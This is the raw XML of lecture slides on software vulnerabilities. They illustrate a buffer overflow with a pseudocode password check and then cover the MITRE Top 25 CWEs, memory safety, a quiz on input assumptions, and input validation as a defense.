          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4800">
                <a:latin typeface="Monaco"/>
                <a:ea typeface="Monaco"/>
                <a:cs typeface="Monaco"/>
                <a:sym typeface="Monaco"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="846666" indent="-846666" algn="l">
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
              <a:defRPr sz="4800">
                <a:latin typeface="Monaco"/>
                <a:ea typeface="Monaco"/>
                <a:cs typeface="Monaco"/>
                <a:sym typeface="Monaco"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>read input into variable X</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4800">
                <a:latin typeface="Monaco"/>
                <a:ea typeface="Monaco"/>
                <a:cs typeface="Monaco"/>
                <a:sym typeface="Monaco"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="846666" indent="-846666" algn="l">
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
              <a:defRPr sz="4800">
                <a:latin typeface="Monaco"/>
                <a:ea typeface="Monaco"/>
                <a:cs typeface="Monaco"/>
                <a:sym typeface="Monaco"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>if X matches the password then log in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4800">
                <a:latin typeface="Monaco"/>
                <a:ea typeface="Monaco"/>
                <a:cs typeface="Monaco"/>
                <a:sym typeface="Monaco"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="846666" indent="-846666" algn="l">
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
              <a:defRPr sz="4800">
                <a:latin typeface="Monaco"/>
                <a:ea typeface="Monaco"/>
                <a:cs typeface="Monaco"/>
                <a:sym typeface="Monaco"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>else print “Failed” to the screen</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="358" name="Shape 358"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286108" y="8455480"/>
            <a:ext cx="1453947" cy="11461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6600"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>X =</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="359" name="Shape 359"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4135712" y="8525380"/>
            <a:ext cx="3813771" cy="90477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4800">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
                <a:ea typeface="Monaco"/>
                <a:cs typeface="Monaco"/>
                <a:sym typeface="Monaco"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Overflow!!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="360" name="Shape 360"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1862398" y="6622413"/>
            <a:ext cx="2301368" cy="1362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8000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:hueOff val="47394"/>
                    <a:satOff val="-25753"/>
                    <a:lumOff val="-7544"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="361" name="pasted-image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="473081" y="610739"/>
            <a:ext cx="7624785" cy="5470783"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="362" name="Shape 362"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079443" y="1191830"/>
            <a:ext cx="3867278" cy="1057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6000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:hueOff val="47394"/>
                    <a:satOff val="-25753"/>
                    <a:lumOff val="-7544"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Password?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="363" name="Shape 363"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079443" y="2188438"/>
            <a:ext cx="6571298" cy="981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5500">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Overflow!!!!! 3.log in</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="364" name="Shape 364"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3032910" y="10279025"/>
            <a:ext cx="5392040" cy="1057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sz="6000" i="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Program halted</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="365" name="Shape 365"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7793896" y="5361795"/>
            <a:ext cx="1333501" cy="755412"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 32000"/>
              <a:gd name="adj2" fmla="val 107597"/>
            </a:avLst>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>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66" name="Shape 366"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9762210" y="625078"/>
            <a:ext cx="14390485" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="572516">
              <a:defRPr sz="10976"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Preventing Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="367" name="pasted-image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7414173" y="8200111"/>
            <a:ext cx="2092946" cy="1656915"/>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5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="365"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36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362"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36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0.000000 0.000000 L -0.000126 0.115368" pathEditMode="relative">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="365"/>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type="lt">
                                    <p:tmAbs val="100"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="20" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="363"/>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grpId="5" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="23" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="359"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="1500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="359"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="25" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="26" presetID="4" presetClass="entr" presetSubtype="32" fill="hold" grpId="6" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="367"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="box(out)">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="367"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="29" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1800"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="30" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" grpId="7" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="300"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="31" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="364"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="3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5" animBg="1" advAuto="0"/>
      <p:bldP spid="362" grpId="2" animBg="1" advAuto="0"/>
      <p:bldP spid="363" grpId="4" animBg="1" advAuto="0"/>
      <p:bldP spid="364" grpId="7" animBg="1" advAuto="0"/>
      <p:bldP spid="365" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="367" grpId="6"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B8010-E973-1BB2-FB2A-3713BD6A4A1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AF8B979-F40D-6AEF-BEA6-D11827508586}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12330550" y="4812042"/>
            <a:ext cx="11323352" cy="8173708"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A1E64E0-555B-AB4B-C43C-A8560E5F091B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="659878" y="3246445"/>
            <a:ext cx="11363792" cy="9698934"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B899895-CE6E-59F4-4D2D-B71E64517816}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695680" y="8432828"/>
            <a:ext cx="11323352" cy="422124"/>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8" name="Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C70232C7-A186-D040-7943-164C9726D3D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="659876" y="9643743"/>
            <a:ext cx="11359156" cy="333718"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">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9" name="Rectangle 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34B27FF4-25A2-8156-81F6-83C1E16AE9FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="659876" y="10047433"/>
            <a:ext cx="11359156" cy="333718"/>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5" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02DBCFF8-74F5-09D2-617B-666918B587ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12360332" y="3160031"/>
            <a:ext cx="10663497" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>Spatial vulnerabilities (buffer overflow)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9199C367-91CA-63DB-9478-62728658248F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12330551" y="6874608"/>
            <a:ext cx="11328426" cy="396604"/>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0" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2936C538-58D5-6595-EC72-A70159176B1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="659876" y="12159937"/>
            <a:ext cx="11359156" cy="825814"/>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1" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F7A3CF5-28D7-319D-C4AD-104C26C7C45A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12330551" y="5623074"/>
            <a:ext cx="11328426" cy="396604"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">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2" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8D3AA5E-5C45-FA4A-B324-7911A3FA26E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12330551" y="6073806"/>
            <a:ext cx="11328426" cy="396604"/>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3" name="Title 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2200D021-E952-18D3-ADB2-FDFCF33F74B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="659876" y="184152"/>
            <a:ext cx="22994026" cy="3016249"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>MITRE Top 25 CWEs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{893AD6A3-B11E-C280-00C9-19DD49ED3106}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="654801" y="11343339"/>
            <a:ext cx="11359156" cy="825815"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B05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 name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCF4348D-A96D-7C14-09F3-103E48FB3D02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12360332" y="3953981"/>
            <a:ext cx="10937611" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>Temporal memory safety vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2121755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par>
                          <p:cTn id="12" fill="hold">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3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="21" presetID="9"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par>
                          <p:cTn id="24" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="25" presetID="9"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par>
                          <p:cTn id="28" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="29" presetID="9"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0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18"/>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5" grpId="0"/>
      <p:bldP spid="4" grpId="0" animBg="1"/>
      <p:bldP spid="10" grpId="0" animBg="1"/>
      <p:bldP spid="11" grpId="0" animBg="1"/>
      <p:bldP spid="12" grpId="0" animBg="1"/>
      <p:bldP spid="1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625078"/>
            <a:ext cx="23513143" cy="1936068"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="8800" dirty="0"/>
              <a:t>Quiz 1: What are reasonable assumptions?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text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Suppose you are writing a PDF viewer that is leaner and better than Acrobat Reader. Which can you assume?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t>PDF files given to your reader will always be well-formed</a:t>
            </a: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t>PDF files will never exceed a particular size</a:t>
            </a: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t>You viewer will never be used as part of an Internet-hosted service</a:t>
            </a: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t>None of the above</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="uk-UA" smtClean="0"/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="uk-UA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="91639215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82B0-81DB-3D4C-98D2-45A8586E0330}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What’s a vulnerability?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7FE8056-0CB9-BC40-A82C-07ABFFFA819B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4387453" y="3134320"/>
            <a:ext cx="16006438" cy="9336129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It’s a kind of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>software bug </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>that can be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>exploited</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> by an attacker to manipulate the software to violate a desired security property</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What vulnerabilities are most important, and how do we defend against them?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We review some vulnerabilities across the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>CWE Top 25</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and show that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>input validation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a common and effective defense</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
